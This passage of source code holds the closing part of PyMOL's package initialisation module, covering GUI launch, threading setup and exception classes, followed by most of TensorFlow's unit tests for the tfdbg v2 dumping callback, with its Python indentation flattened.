elif (' R300 ' in vendor # V: X.Org R300 Project, R: Gallium 0.4 on ATI RV370
):
if invocation.options.show_splash:
print(" Detected blacklisted graphics driver. Disabling shaders.")
cmd.set("use_shaders", 0)
# find out how many processors we have, and adjust hash
# table size to reflect available RAM
try:
import multiprocessing
ncpu = multiprocessing.cpu_count()
if ncpu > 1:
cmd.set("max_threads", ncpu)
if invocation.options.show_splash:
print(" Detected %d CPU cores."%ncpu, end=' ')
print(" Enabled multithreaded rendering.")
except:
pass
# store our adapted state as default
cmd.reinitialize("store")
def launch_gui(self):
'''
Launch if requested:
- external GUI
'''
pymol_path = os.getenv('PYMOL_PATH', '')
try:
poll = IS_MACOS
if self.invocation.options.external_gui == 3:
if 'DISPLAY' not in os.environ:
os.environ['DISPLAY'] = ':0.0'
if self.invocation.options.external_gui in (1, 3):
__import__(self.invocation.options.gui)
sys.modules[self.invocation.options.gui].__init__(self, poll,
skin = self.invocation.options.skin)
# import plugin system
import pymol.plugins
except:
traceback.print_exc()
def prime_pymol():
'''
Set the current thread as the glutThread
'''
global glutThread
if not glutThread:
glutThread = thread.get_ident()
def _launch_no_gui():
import pymol2
p = pymol2.SingletonPyMOL()
p.start()
# TODO sufficient?
while (p.idle() or p.getRedisplay() or
invocation.options.keep_thread_alive or
cmd.get_modal_draw() or
cmd.get_setting_int('keep_alive') or
cmd._pymol._stdin_reader_thread is not None):
p.draw()
# TODO needed?
cmd.sync()
p.stop()
def launch(args=None, block_input_hook=0):
'''
Run PyMOL with args
Only returns if we are running pretend GLUT.
'''
if args is None:
args = sys.argv
invocation.parse_args(args)
if invocation.options.gui == 'pmg_qt':
if invocation.options.no_gui:
return _launch_no_gui()
elif invocation.options.testing:
return pymol._cmd.test2()
try:
from pmg_qt import pymol_qt_gui
return pymol_qt_gui.execapp()
except ImportError as ex:
print(f'Qt not available ({ex}), using GLUT/Tk interface')
invocation.options.gui = 'pmg_tk'
prime_pymol()
_cmd.runpymol(None, block_input_hook)
def finish_launching(args=None):
'''
Start the PyMOL process in a thread
THIS IS NOT SUPPORTED ON macOS
'''
global glutThreadObject
if cmd._COb is not None:
return
import pymol
# legacy
if args is None:
args = getattr(pymol, 'pymol_argv', None)
if args is None:
args = getattr(__main__, 'pymol_argv', sys.argv)
if True:
# run PyMOL in thread
invocation.options.keep_thread_alive = 1
cmd.reaper = threading.current_thread()
glutThreadObject = threading.Thread(target=launch,
args=(list(args), 1))
glutThreadObject.start()
e = threading.Event()
# wait for the C library to initialize
while cmd._COb is None:
e.wait(0.01)
# make sure symmetry module has time to start...
while not hasattr(pymol, 'xray'):
e.wait(0.01)
class CmdException(Exception):
'''
Exception type for PyMOL commands
'''
label = "Error"
def __init__(self, message='', label=None):
self.message = message
if message:
self.args = (message,)
if label:
self.label = label
def __str__(self):
return " %s: %s" % (self.label, self.message)
class IncentiveOnlyException(CmdException):
'''
Exception type for features that are not available in Open-Source PyMOL
'''
label = "Incentive-Only-Error"
def __init__(self, message=''):
if not message:
try:
funcname = sys._getframe(1).f_code.co_name
message = '"%s" is not available in Open-Source PyMOL' % (funcname,)
except:
message = 'Not available in Open-Source PyMOL'
message += '\n\n' \
' Please visit http://pymol.org if you are interested in the\n' \
' full featured "Incentive PyMOL" version.\n'
super(IncentiveOnlyException, self).__init__(message)
class Scratch_Storage:
'''
Generic namespace
'''
def __reduce__(self):
# for loading Python 3 (new-style class) pickle with Python 2
return (self.__class__, (), self.__dict__)
def get_unused_name(self, prefix='tmp'):
'''
Get an unused name from this namespace
'''
i = 1
while True:
name = prefix + str(i)
if not hasattr(self, name):
setattr(self, name, None)
return name
i += 1
class Session_Storage:
'''
Generic namespace
'''
def __reduce__(self):
# for loading Python 3 (new-style class) pickle with Python 2
return (self.__class__, (), self.__dict__)
def _colortype(cmd):
# backwards compatible color index type for iterate, which used
# to expose colors as RGB tuples
get_color_tuple = cmd.get_color_tuple
class Color(int):
def __getitem__(self, i):
return get_color_tuple(self)[i]
def __len__(self):
return 3
return Color
######### VARIABLES ############################
glutThread = None
######### ENVIRONMENT ##########################
setup_environ()
# initialize instance-specific module/object internals
_init_internals(sys.modules[__name__])
# get X-window support (machine_get_clipboard)
if 'DISPLAY' in os.environ:
from .xwin import *
########## C MODULE ############################
import pymol._cmd
_cmd = sys.modules['pymol._cmd']
get_capabilities = _cmd.get_capabilities
from . import cmd
cmd._COb = None
try:
import epymol
except ImportError:
pass
########## WORKAROUND TO PREVENT "import cmd" ##############################
# Previous versions of PyMOL did relative imports and thus allowd
# "import cmd" in pymol scripts to import the pymol.cmd module. To be more
# strict and for compatibility with python3 we use absolute imports now,
# which unfortunately will import an unrelated "cmd" module from the default
# python library, and even worse will corrupt the pymol namespace with it.
# The following causes an import error for "import cmd":
class _NoCmdFinder:
def find_spec(self, fullname, path=None, target=None):
if path is None and fullname == 'cmd':
msg = 'use "from pymol import cmd" instead of "import cmd"'
print('Warning: {}'.format(msg))
return None
find_module = find_spec
sys.meta_path.insert(0, _NoCmdFinder())
########## LEGACY PRINT STATEMENT FOR PYMOL COMMAND LINE ###################
if True:
def _print_statement(*args, **_):
'''Legacy Python-2-like print statement for the PyMOL command line'''
kw = {}
if args and args[0].startswith('>>'):
kw['file'] = eval(args[0][2:])
args = args[1:]
if args and not args[-1]:
kw['end'] = ' '
args = args[:-1]
args = [eval(a) for a in args]
print(*args, **kw)
cmd.extend('print', _print_statement)
|
dumping_callback_test.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit tests for tfdbg v2 dumping callback."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import shutil
import tempfile
import threading
from absl.testing import parameterized
import numpy as np
from tensorflow.core.protobuf import debug_event_pb2
from tensorflow.python.debug.lib import debug_events_reader
from tensorflow.python.debug.lib import dumping_callback
from tensorflow.python.debug.lib import dumping_callback_test_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.keras import models
from tensorflow.python.keras.applications import mobilenet_v2
from tensorflow.python.keras.layers import core
from tensorflow.python.keras.layers import recurrent_v2
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
def _create_simple_recurrent_keras_model(input_shape):
"""Create a simple tf.keras model containing a recurrent layer for testing."""
model = models.Sequential()
model.add(recurrent_v2.LSTM(
10,
input_shape=input_shape,
kernel_initializer="zeros",
recurrent_initializer="zeros"))
model.add(core.Dense(1, kernel_initializer="zeros"))
model.compile(loss="mse", optimizer="sgd")
return model
class TracingCallbackTest(
dumping_callback_test_lib.DumpingCallbackTestBase, parameterized.TestCase):
def setUp(self):
super(TracingCallbackTest, self).setUp()
self.dump_root = tempfile.mkdtemp()
def tearDown(self):
if os.path.isdir(self.dump_root):
shutil.rmtree(self.dump_root, ignore_errors=True)
dumping_callback.disable_dump_debug_info()
super(TracingCallbackTest, self).tearDown()
def testInvalidTensorDebugModeCausesError(self):
with self.assertRaisesRegexp(
ValueError,
r"Invalid value in tensor_debug_mode \(\'NONSENSICAL\'\).*"
r"Valid options.*NO_TENSOR.*"):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NONSENSICAL")
def testDisablingTracingCallbackWithoutEnablingFirstIsTolerated(self):
dumping_callback.disable_dump_debug_info()
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("FullTensor", "FULL_TENSOR"),
)
def testPureEagerOpExecution(self, tensor_debug_mode):
"""Test dumping data from eager op execution: float32."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
x = constant_op.constant(10.0)
zero = constant_op.constant(0.0)
one = constant_op.constant(1.0)
two = constant_op.constant(2.0)
three = constant_op.constant(3.0)
# Use Collatz conjecture as a test case.
while x > one:
if math_ops.equal(x % two, zero):
x = x / two
else:
x = x * three + one
writer.FlushNonExecutionFiles()
self._readAndCheckMetadataFile()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
# Before FlushExecutionFiles() is called, the .execution file should be
# empty.
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
execution_iter = reader.execution_iterator()
with self.assertRaises(StopIteration):
next(execution_iter)
# After the flushing, the .execution file should hold the appropriate
# contents.
writer.FlushExecutionFiles()
execution_iter = reader.execution_iterator()
prev_wall_time = 1
executed_op_types = []
tensor_values = collections.defaultdict(lambda: [])
for debug_event in execution_iter:
self.assertGreaterEqual(debug_event.wall_time, prev_wall_time)
prev_wall_time = debug_event.wall_time
execution = debug_event.execution
executed_op_types.append(execution.op_type)
# No graph IDs should have been logged for eager op executions.
self.assertFalse(execution.graph_id)
self.assertTrue(execution.input_tensor_ids)
self.assertTrue(execution.output_tensor_ids)
if tensor_debug_mode == "NO_TENSOR":
# Due to the NO_TENSOR tensor debug mode, tensor_protos ought to
# be empty.
self.assertFalse(execution.tensor_protos)
elif tensor_debug_mode == "CURT_HEALTH":
self.assertLen(execution.tensor_protos, 1)
if execution.op_type in ("AddV2", "Mul", "RealDiv"):
# 1st element: -1 is the unset tensor_id for eager op execution.
# 2nd element: 0 means there is no inf or nan.
self.assertAllClose(
tensor_util.MakeNdarray(execution.tensor_protos[0]),
[-1.0, 0.0])
elif tensor_debug_mode == "FULL_TENSOR":
# Under the FULL_TENSOR mode, the value of the tensor should be
# available through `tensor_protos`.
tensor_value = float(
tensor_util.MakeNdarray(execution.tensor_protos[0]))
tensor_values[execution.op_type].append(tensor_value)
# Verify the code_location field.
self.assertTrue(execution.code_location.stack_frame_ids)
for stack_frame_id in execution.code_location.stack_frame_ids:
self.assertIn(stack_frame_id, stack_frame_by_id)
if tensor_debug_mode == "FULL_TENSOR":
self.assertAllClose(tensor_values["Greater"], [1, 1, 1, 1, 1, 1, 0])
self.assertAllClose(tensor_values["RealDiv"], [5, 8, 4, 2, 1])
self.assertAllClose(tensor_values["Mul"], [15])
self.assertAllClose(tensor_values["AddV2"], [16])
self.assertEqual(
executed_op_types,
[
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 10 --> 5
"Greater",
"FloorMod",
"Equal",
"Mul",
"AddV2", # 5 --> 16
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 16 --> 8
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 8 --> 4
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 4 --> 2
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 2 --> 1
"Greater"
])
# Due to the pure eager op execution, the .graph file and the
# .graph_execution_traces file ought to be empty.
graphs_iterator = reader.graphs_iterator()
with self.assertRaises(StopIteration):
next(graphs_iterator)
graph_trace_iter = reader.graph_execution_traces_iterator()
with self.assertRaises(StopIteration):
next(graph_trace_iter)
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testNestedFunctionExecutionWithoutControlFlow(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def log_sum(x, y):
return math_ops.log(x + y)
@def_function.function
def sin1p_log_sum(x, y):
return math_ops.sin(1.0 + log_sum(x, y))
x = constant_op.constant(2.0)
y = constant_op.constant(3.0)
self.assertAllClose(sin1p_log_sum(x, y), np.sin(1.0 + np.log(5.0)))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, so doesn't get logged to the
# .execution file.
(executed_op_types, executed_graph_ids,
_, _, _, _) = self._readAndCheckExecutionFile()
executed_op_types = [op_type for op_type in executed_op_types
if "sin1p_log_sum" in op_type]
self.assertLen(executed_op_types, 1)
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, op_types, op_name_to_op_type,
op_name_to_context_id) = self._readAndCheckGraphsFile(stack_frame_by_id)
self.assertIn("AddV2", op_types)
self.assertIn("Log", op_types)
self.assertIn("Sin", op_types)
if context.executing_eagerly():
# Check the correctness of the ID of the executed graph ID.
sin_op_name = [op_name for op_name in op_name_to_op_type
if op_name_to_op_type[op_name] == "Sin"]
self.assertLen(sin_op_name, 1)
sin_context_id = op_name_to_context_id[sin_op_name[0]]
# The executed "op" is a FuncGraph, and its graph ID should have been
# recorded properly and be the ID of the graph that the Sin op belongs to.
executed_graph_ids = [
executed_graph_ids[i] for i, op_type
in enumerate(executed_op_types) if "sin1p_log_sum" in op_type]
self.assertEqual(executed_graph_ids[0], sin_context_id)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
self.assertEqual(executed_op_types, ["AddV2", "Log", "AddV2", "Sin"])
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought to
# be an empty float32 tensor.
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
elif tensor_debug_mode == "CURT_HEALTH":
for tensor_value in tensor_values:
self.assertLen(tensor_value, 2)
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: 0 means there is no inf or nan.
self.assertEqual(tensor_value[1], 0)
elif tensor_debug_mode == "FULL_TENSOR":
self.assertAllClose(tensor_values[0], 5.0) # 1st AddV2 op.
self.assertAllClose(tensor_values[1], np.log(5.0)) # Log op.
self.assertAllClose(tensor_values[2], np.log(5.0) + 1.0) # 2nd AddV2 op.
self.assertAllClose(tensor_values[3],
np.sin(np.log(5.0) + 1.0)) # Sin op.
def testCapturingExecutedGraphIdsOfTwoCompilationsOfSameFunction(self):
"""Test correct executed IDs of two FuncGraphs from the same Py function."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
@def_function.function
def ceil_times_two(x):
return math_ops.ceil(x) * 2.0
x_float32 = np.array(3.5, dtype=np.float32)
x_float64 = np.array(4.5, dtype=np.float64)
# Four executions, with two different FuncGraphs, which should lead
# to two unique executed graph IDs (see assertion below).
self.assertAllClose(ceil_times_two(x_float32), 8.0)
self.assertAllClose(ceil_times_two(x_float64), 10.0)
self.assertAllClose(ceil_times_two(x_float32), 8.0)
self.assertAllClose(ceil_times_two(x_float64), 10.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
(executed_op_types, executed_graph_ids,
_, _, _, _) = self._readAndCheckExecutionFile()
self.assertLen(executed_op_types, 4)
for executed_op_type in executed_op_types:
self.assertStartsWith(executed_op_type, "__inference_ceil_times_two_")
self.assertLen(executed_graph_ids, 4)
self.assertEqual(executed_graph_ids[0], executed_graph_ids[2])
self.assertEqual(executed_graph_ids[1], executed_graph_ids[3])
self.assertLen(set(executed_graph_ids), 2)
def testCapturingExecutedGraphIdsOfDuplicateFunctionNames(self):
"""Two FuncGraphs compiled from Python functions with identical names."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
class TestClass(object):
@def_function.function
def ceil_times_two(self, x):
return math_ops.ceil(x) * 2.0
# The `ceil_times_two` method of the two objects will be compiled
# into separate FuncGraphs.
test_object_1 = TestClass()
test_object_2 = TestClass()
x = np.array(3.5, dtype=np.float32)
# Four executions, with two different FuncGraphs, which should lead
# to two unique executed graph IDs (see assertion below).
self.assertAllClose(test_object_1.ceil_times_two(x), 8.0)
self.assertAllClose(test_object_2.ceil_times_two(x), 8.0)
self.assertAllClose(test_object_1.ceil_times_two(x), 8.0)
self.assertAllClose(test_object_2.ceil_times_two(x), 8.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
(executed_op_types, executed_graph_ids,
_, _, _, _) = self._readAndCheckExecutionFile()
self.assertLen(executed_op_types, 4)
for executed_op_type in executed_op_types:
self.assertStartsWith(executed_op_type, "__inference_ceil_times_two_")
self.assertLen(executed_graph_ids, 4)
self.assertEqual(executed_graph_ids[0], executed_graph_ids[2])
self.assertEqual(executed_graph_ids[1], executed_graph_ids[3])
self.assertLen(set(executed_graph_ids), 2)
@parameterized.named_parameters(
("AddV2", "AddV2"),
("Log", "Log"),
("AddV2AndLog", "(AddV2|Log)"),
)
@test_util.run_in_graph_and_eager_modes
def testOpRegex(self, op_regex):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="FULL_TENSOR",
op_regex=op_regex)
@def_function.function
def log_sum(x, y):
return math_ops.log(x + y)
@def_function.function
def sin1p_log_sum(x, y):
return math_ops.sin(1.0 + log_sum(x, y))
x = constant_op.constant(2.0)
y = constant_op.constant(3.0)
self.assertAllClose(
self.evaluate(sin1p_log_sum(x, y)), np.sin(1.0 + np.log(5.0)))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, op_types,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
self.assertIn("AddV2", op_types)
self.assertIn("Log", op_types)
self.assertIn("Sin", op_types)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
if op_regex == "AddV2":
self.assertEqual(executed_op_types, ["AddV2", "AddV2"])
self.assertLen(tensor_values, 2)
self.assertAllClose(tensor_values[0], 5.0) # 1st AddV2 op.
self.assertAllClose(tensor_values[1], np.log(5.0) + 1.0) # 2nd AddV2 op.
elif op_regex == "Log":
self.assertEqual(executed_op_types, ["Log"])
self.assertLen(tensor_values, 1)
self.assertAllClose(tensor_values[0], np.log(5.0)) # Log op.
else: # "(AddV2|Log)"
self.assertEqual(executed_op_types, ["AddV2", "Log", "AddV2"])
self.assertLen(tensor_values, 3)
self.assertAllClose(tensor_values[0], 5.0) # 1st AddV2 op.
self.assertAllClose(tensor_values[1], np.log(5.0)) # Log op.
self.assertAllClose(tensor_values[2], np.log(5.0) + 1.0) # 2nd AddV2 op.
def testIncorrectTensorDTypeArgFormatLeadsToError(self):
with self.assertRaisesRegexp(
ValueError,
r".*expected.*list.*tuple.*callable.*but received.*\{\}"):
dumping_callback.enable_dump_debug_info(self.dump_root,
tensor_dtypes=dict())
with self.assertRaisesRegexp(
ValueError,
r".*expected.*list.*tuple.*callable.*but received.*"):
dumping_callback.enable_dump_debug_info(self.dump_root,
tensor_dtypes="float32")
with self.assertRaisesRegexp(
ValueError,
r".*expected.*list.*tuple.*callable.*but received.*"):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_dtypes=dtypes.float32)
with self.assertRaises(TypeError):
dumping_callback.enable_dump_debug_info(self.dump_root, tensor_dtypes=[
lambda dtype: dtype.is_floating, lambda dtype: dtype.is_integer])
@parameterized.named_parameters(
("float", [dtypes.float32], None),
("float_only_sum", ["float32"], "Sum"),
("float_no_sum", (dtypes.float32,), "(?!Sum)"),
("int", [dtypes.int32], None),
("int_via_lambda", lambda dtype: dtype.is_integer, None),
("exclude_Sum", None, "(?!Sum)"),
("All", None, None),
)
@test_util.run_in_graph_and_eager_modes
def testTensorDTypesAndOpRegexFilters(self,
tensor_dtypes,
op_regex):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="FULL_TENSOR",
tensor_dtypes=tensor_dtypes,
op_regex=op_regex)
@def_function.function
def unique_sum(xs):
"""Sum over the unique values, for testing."""
unique_xs, indices = array_ops.unique(xs)
return math_ops.reduce_sum(unique_xs), indices
xs = constant_op.constant([2., 6., 8., 1., 2.], dtype=dtypes.float32)
y, indices = self.evaluate(unique_sum(xs))
self.assertAllClose(y, 17.)
self.assertAllEqual(indices, [0, 1, 2, 3, 0])
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, _,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
if tensor_dtypes == [dtypes.float32] and not op_regex:
self.assertEqual(executed_op_types, ["Unique", "Sum"])
self.assertLen(tensor_values, 2)
self.assertAllClose(tensor_values[0], [2., 6., 8., 1.]) # Unique values.
self.assertAllClose(tensor_values[1], 17.) # Sum.
elif tensor_dtypes == ["float32"] and op_regex == "Sum":
self.assertEqual(executed_op_types, ["Sum"])
self.assertLen(tensor_values, 1)
self.assertAllClose(tensor_values[0], 17.) # Sum.
elif tensor_dtypes == (dtypes.float32,) and op_regex == "(?!Sum)":
self.assertEqual(executed_op_types, ["Unique"])
self.assertLen(tensor_values, 1)
self.assertAllClose(tensor_values[0], [2., 6., 8., 1.]) # Unique values.
elif tensor_dtypes == [dtypes.int32] and not op_regex:
self.assertEqual(executed_op_types, ["Unique"])
self.assertLen(tensor_values, 1)
self.assertAllEqual(tensor_values[0], [0, 1, 2, 3, 0]) # Unique indices.
elif callable(tensor_dtypes) and not op_regex:
self.assertEqual(executed_op_types, ["Unique"])
self.assertLen(tensor_values, 1)
self.assertAllEqual(tensor_values[0], [0, 1, 2, 3, 0]) # Unique indices.
elif not tensor_dtypes and op_regex == "(?!Sum)":
self.assertEqual(executed_op_types, ["Unique", "Unique"])
self.assertLen(tensor_values, 2)
self.assertAllClose(tensor_values[0], [2., 6., 8., 1.]) # Unique values.
self.assertAllEqual(tensor_values[1], [0, 1, 2, 3, 0]) # Unique indices.
else: # "All".
self.assertEqual(executed_op_types, ["Unique", "Unique", "Sum"])
self.assertLen(tensor_values, 3)
self.assertAllClose(tensor_values[0], [2., 6., 8., 1.]) # Unique values.
self.assertAllEqual(tensor_values[1], [0, 1, 2, 3, 0]) # Unique indices.
self.assertAllClose(tensor_values[2], 17.) # Sum.
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testFunctionExecutionWithControlFlow(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def iterative_doubling(x, times):
i = constant_op.constant(0, dtype=dtypes.int32)
while i < times:
x = x * 2.0
i += 1
return x
x = constant_op.constant(0.5, dtype=dtypes.float32)
times = constant_op.constant(4, dtype=dtypes.int32)
self.assertAllClose(self.evaluate(iterative_doubling(x, times)), 8.0)
writer.FlushNonExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
# Verify the content of the .graphs file.
context_ids, op_types, op_name_to_op_type, _ = (
self._readAndCheckGraphsFile(stack_frame_by_id))
self.assertIn("Less", op_types)
self.assertIn("Mul", op_types)
self.assertIn("AddV2", op_types)
# Before FlushExecutionFiles() is called, the .execution and
# .graph_execution_traces files should be both empty.
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
execution_iter = reader.execution_iterator()
graph_execution_traces_iter = reader.graph_execution_traces_iterator()
with self.assertRaises(StopIteration):
next(execution_iter)
with self.assertRaises(StopIteration):
next(graph_execution_traces_iter)
# TODO(cais): Backport execution instrumentation to tf.Session.
writer.FlushExecutionFiles()
# After the flushing, the .execution file should hold the appropriate
# contents.
if context.executing_eagerly():
(executed_op_types, _, input_tensor_ids, output_tensor_ids,
tensor_debug_modes, tensor_values) = self._readAndCheckExecutionFile()
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, hence it doesn't get logged to the
# .execution file.
self.assertLen(executed_op_types, 1)
self.assertIn("iterative_doubling", executed_op_types[0])
self.assertLen(input_tensor_ids[0], 2)
self.assertLen(output_tensor_ids[0], 1)
self.assertEqual(
tensor_debug_modes[0],
debug_event_pb2.TensorDebugMode.Value(tensor_debug_mode))
if tensor_debug_mode == "FULL_TENSOR":
self.assertAllClose(tensor_values, [[8.0]])
(op_names, _, output_slots,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
# The Less op should have been executed 5 times.
self.assertEqual(executed_op_types.count("Less"), 5)
# The last executed op should be Less.
self.assertEqual(executed_op_types[-1], "Less")
# The Mul op should have been executed 4 times.
self.assertEqual(executed_op_types.count("Mul"), 4)
# The AddV2 op should have been run, but we refrain from asserting on how
# many times it's executed.
self.assertIn("AddV2", executed_op_types)
for output_slot in output_slots:
self.assertEqual(output_slot, 0)
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought
# to be an empty float32 tensor.
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
elif tensor_debug_mode == "CURT_TENSOR":
for tensor_value in tensor_values:
self.assertLen(tensor_value, 2)
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: 0 means there is no inf or nan.
self.assertEqual(tensor_value[1], 0)
elif tensor_debug_mode == "FULL_TENSOR":
less_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Less"
]
self.assertAllClose(less_values, [True, True, True, True, False])
mul_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Mul"
]
self.assertAllClose(mul_values, [1.0, 2.0, 4.0, 8.0])
def testCallingEnableTracingTwiceWithTheSameDumpRootIsIdempotent(self):
dumping_callback.enable_dump_debug_info(self.dump_root)
writer = dumping_callback.enable_dump_debug_info(self.dump_root)
x = constant_op.constant([10.0, 12.0, 10.0])
for _ in range(2):
array_ops.unique(x)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
execution_iter = reader.execution_iterator()
for _ in range(2):
debug_event = next(execution_iter)
self.assertGreater(debug_event.wall_time, 0)
execution = debug_event.execution
self.assertEqual(execution.op_type, "Unique")
self.assertEqual(execution.num_outputs, 2)
self.assertTrue(execution.code_location)
with self.assertRaises(StopIteration):
next(execution_iter)
def testCallingEnableTracingTwiceWithDifferentDumpRootsOverwrites(self):
dumping_callback.enable_dump_debug_info(self.dump_root)
new_dump_root = self.dump_root + "_new_dump_root"
writer = dumping_callback.enable_dump_debug_info(new_dump_root)
x = constant_op.constant([10.0, 12.0, 10.0])
for _ in range(2):
array_ops.unique(x)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugEventsReader(new_dump_root) as reader:
execution_iter = reader.execution_iterator()
for _ in range(2):
debug_event = next(execution_iter)
self.assertGreater(debug_event.wall_time, 0)
execution = debug_event.execution
self.assertEqual(execution.op_type, "Unique")
self.assertEqual(execution.num_outputs, 2)
self.assertTrue(execution.code_location)
with self.assertRaises(StopIteration):
next(execution_iter)
with debug_events_reader.DebugEventsReader(
self.dump_root) as old_dump_root_reader:
execution_iter = old_dump_root_reader.execution_iterator()
# The old dump root shouldn't have been written to.
with self.assertRaises(StopIteration):
next(execution_iter)
def testCallingEnableRepeatedlyWithDifferentTensorDebugMode(self):
"""Assert that calling enable_dump_debug_info() with different tensor-debug modes.
It should lead to overwriting of the previously-configured mode.
"""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
@def_function.function
def add_1_divide_by_2(x):
return (x + 1.0) / 2.0
self.assertAllClose(add_1_divide_by_2(constant_op.constant(4.0)), 2.5)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
context_ids, _, _, _ = self._readAndCheckGraphsFile(stack_frame_by_id)
_, _, _, _, _, tensor_values = self._readAndCheckExecutionFile()
self.assertEqual(tensor_values, [[]])
(_, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
self.assertLen(tensor_values, 2)
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
with self.assertRaisesRegexp(
ValueError, r"already.*NO_TENSOR.*FULL_TENSOR.*not be honored"):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="FULL_TENSOR")
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
def testDisableTracingWorks(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
dumping_callback.disable_dump_debug_info()
x = constant_op.constant([10.0, 12.0, 10.0])
for _ in range(2):
array_ops.unique(x)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
source_files_iter = reader.source_files_iterator()
stack_frames_iter = reader.stack_frames_iterator()
execution_iter = reader.execution_iterator()
# No source-file, stack-frame or execution data should have been dumped.
with self.assertRaises(StopIteration):
next(source_files_iter)
with self.assertRaises(StopIteration):
next(stack_frames_iter)
with self.assertRaises(StopIteration):
